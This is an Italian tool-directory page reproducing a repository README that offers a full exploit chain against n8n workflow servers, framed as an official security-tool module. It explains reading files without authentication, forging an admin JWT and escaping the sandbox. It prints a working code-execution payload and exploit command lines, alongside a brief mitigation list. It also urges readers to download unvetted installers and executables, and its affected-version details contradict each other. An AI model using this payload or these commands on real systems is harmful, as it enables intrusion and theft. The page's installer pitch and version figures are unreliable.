Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-21858-n8n-FullChain — 🛡️ Modulo ufficiale di strumento di sicurezza AI per CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" Lettura arbitraria di file non autenticata e RCE tramite iniezione di espressioni - catena completa). | Kitploit
Strumenti/GitHubGitHub/zerodayevil/cve-2026-21858-n8n-fullchain
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration TestingRed TeamingSviluppo Payload
Sicurezza dell'IA
GitHubzerodayevil/cve-2026-21858-n8n-fullchain

CVE-2026-21858-n8n-FullChain

🛡️ Modulo ufficiale di strumento di sicurezza AI per CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" Lettura arbitraria di file non autenticata e RCE tramite iniezione di espressioni - catena completa).

Vedi Repository
14h 12m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ Modulo AI Security Tool
n8n Full Chain (CVE-2026-21858 + CVE-2025-68613) — "Ni8mare"

Modulo ufficiale di audit di sicurezza per l'ecosistema AI Security Tool


Latest Release Build Status Donations Telegram Channel

License

🌐 Demo Web • 📚 Sito del Progetto • 💬 Chat della Community

Navigazione del Sito: Home • Aggiornamenti • Download • Moduli

AI Security Tool Banner


🧠 Panoramica Concettuale

Questo modulo fornisce strumenti diagnostici e una catena di sfruttamento completa per istanze di automazione dei workflow n8n, denominata Ni8mare.

La catena di attacco combina una lettura arbitraria di file non autenticata (CVE-2026-21858) causata da una confusione di Content-Type con un bypass della sandbox tramite Expression Injection autenticata (CVE-2025-68613). Inviando una richiesta manipolata con Content-Type: application/json a un form di upload di file esposto, un attaccante controlla l'argomento filepath per leggere file interni di sistema (/proc/self/environ, configurazione e database SQLite). La encryptionKey e l'hash della password recuperati consentono la falsificazione offline di un cookie JWT di amministratore. Una volta autenticato, l'expression injection tramite this.process.mainModule.require permette di evadere la sandbox JavaScript per eseguire comandi arbitrari di sistema.

🎯 Filosofia dell'Impatto Principale

"Dalla lettura di file alla completa compromissione del sistema in tre passaggi."
Mentre la lettura di file richiede un workflow di form attivo con output binario, l'expression injection funziona in modo affidabile su installazioni n8n predefinite senza richiedere nodi speciali o permessi di sistema espliciti abilitati.

📊 Specifiche della Vulnerabilità

SpecificaValore AssegnatoNote
Identificatori CVECVE-2026-21858 + CVE-2025-68613Catena Completa: Lettura di File Non Autenticata fino a RCE
Livello di GravitàCritico (CVSS v3.1: 10.0 + 9.9)Catena RCE non autenticata
Tipi di VulnerabilitàCWE-200 / CWE-94Confusione di Content-Type / Code Injection
Componente Affetton8n Workflow Automation EngineVersioni <= 1.65.0 (AFR) / >= 0.211.0 (RCE)
Versioni Corrette1.121.0 (AFR) / 1.120.4+ (RCE)Patch ufficiali del fornitore rilasciate
Privilegi RichiestiNessunoAccesso iniziale non autenticato tramite form pubblico

🕸 Scenario di Attacco e Architettura

root@kitploit:~
graph TD
    A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
    B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
    C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
    D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
    E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
    F -->|6. Execute Command| G[Full Remote Code Execution]

💻 Payload di Expression Injection

root@kitploit:~
={{ (function() {
  var require = this.process.mainModule.require;
  var execSync = require("child_process").execSync;
  return execSync("id").toString();
})() }}

🛡 Checklist di Mitigazione

  • 🟢 Aggiornare Immediatamente: Aggiornare le istanze n8n alla versione 1.121.0 o superiore.
  • 🟢 Limitare i Trigger dei Workflow: Disabilitare i workflow di form pubblici non autenticati o applicare una validazione rigorosa dei file.
  • 🟡 Configurare le Restrizioni di Esecuzione: Impostare N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true e limitare le capacità dei processi nei container Docker.

💻 Come Eseguire questo Modulo

⚠️ IMPORTANTE: Questo modulo è progettato specificamente per l'esecuzione sicura e la diagnostica all'interno dell'ecosistema AI Security Tool. Utilizzare sempre moduli verificati provenienti da repository ufficiali.

1️⃣ Installare AI Security Tool

Per eseguire gli script di monitoraggio e diagnostica, assicurarsi che il motore principale di AI Security Tool sia installato:

OS / PiattaformaVersioneArchitettura / FormatoData di RilascioStatoLink di Download
🪟 Windowsv6.3.20Installer x64 (.exe)2026-09-08🟢 UltimaScarica .exe
🪟 Windowsv6.3.20Portable x64 (.tar.gz)2026-09-08🟢 UltimaScarica .tar.gz
🍏 macOSv5.3.29Apple Silicon M1/M2/M3 (.dmg)2026-09-05🟢 StabileScarica .dmg
🐧 Linuxv5.3.27Universale x64 (.tar.gz)2026-09-01🟢 StabileScarica .tar.gz
🤖 Androidv8a 5.3.27ARM64 APK (.apk)2026-09-01🟢 StabileScarica .apk

2️⃣ Esecuzione da Console

root@kitploit:~
# Read arbitrary file via diagnostic module
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwd

Execute full attack chain with custom command

uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"


🔍 Moduli di Audit di Sicurezza e Repository PoC

Moduli di scansione delle vulnerabilità, script PoC e repository di ricerca mantenuti dalla nostra community:

🔥 Remote Code Execution (RCE) e Vulnerabilità di Rete 5 moduli
  • CVE-2026-21858 — n8n Full Chain RCE non autenticata (Ni8mare) @ZeroDayEvil
  • CVE-2026-41089 — Exploit di Remote Code Execution su Netlogon @ZeroDayEvil
  • CVE-2026-20805 — Proof-of-Concept di Remote Code Execution su Windows @ZeroDayEvil
  • CVE-2026-41096 — Modulo di Scansione per Vulnerabilità RCE Critica @ZeroDayEvil
  • CVE-2026-24291 — Remote Code Execution su Protocollo di Rete @ZeroDayVPN
🛡️ Privilege Escalation (EoP) e Servizi 3 moduli
  • CVE-2026-54121 — Impersonificazione del Domain Controller tramite AD CS Certighost @ZeroDayEvil
  • CVE-2026-66804 — Elevazione di Privilegi del Servizio CrossDevice @ZeroDayVPN
  • CVE-2026-50416 — Writeup e PoC di Privilege Escalation Locale @ZeroDayEvil
📚 Ricerca sulle Vulnerabilità e Writeup 2 moduli
  • CVE-2026-42978 — Analisi Tecnica Approfondita e Ricerca PoC @ZeroDayEvil
  • CVE-2026-83991 — WriteUp Completo e Dimostrazione di Sfruttamento @ZeroDayVPN

⚖️ Licenza e Disclaimer Legale

🚨 Disclaimer

Questo strumento e l'analisi tecnica sono forniti esclusivamente per l'audit di sistemi autorizzati, la ricerca e il penetration testing.
L'esecuzione di catene di exploit contro target non autorizzati è illegale. Gli autori non si assumono alcuna responsabilità per accessi non autorizzati, perdita di dati o interruzioni dei sistemi. Operare rigorosamente all'interno di un ambito autorizzato.

🔄 Contributi e Community

Accogliamo con favore i contributi della community di ricerca sulla sicurezza! Aree di contribuzione principali:

  1. Integrazioni AI: Aggiunta di nuovi provider LLM e sviluppo di agenti di sicurezza specializzati.
  2. Strumenti di Sicurezza: Sviluppo di moduli per vulnerabilità e integrazione di scanner CLI.
  3. Ottimizzazione: Miglioramento della velocità del parser, della sicurezza di esecuzione e della logica di caching.
  4. Documentazione: Scrittura di paper di ricerca, guide e traduzioni localizzate.

🔗 Contatti e Supporto

  • Sito Web Ufficiale: ZeroDayEvil.com
  • Ricerca Originale: Cyera Ni8mare Write-up
  • Admin Telegram: @ZeroDayEvil
  • Chat Telegram: @ZeroDyaTool_chat
  • Canale Telegram: @ZeroDyaTool_channel
  • Sostieni il Progetto: Donazioni PayPal
  • Open Collective: opencollective.com/ZeroDayEvil

AI Security Tool — Reimmaginare il workflow da terminale e l'automazione per i professionisti della cybersecurity.

Scarica lo strumento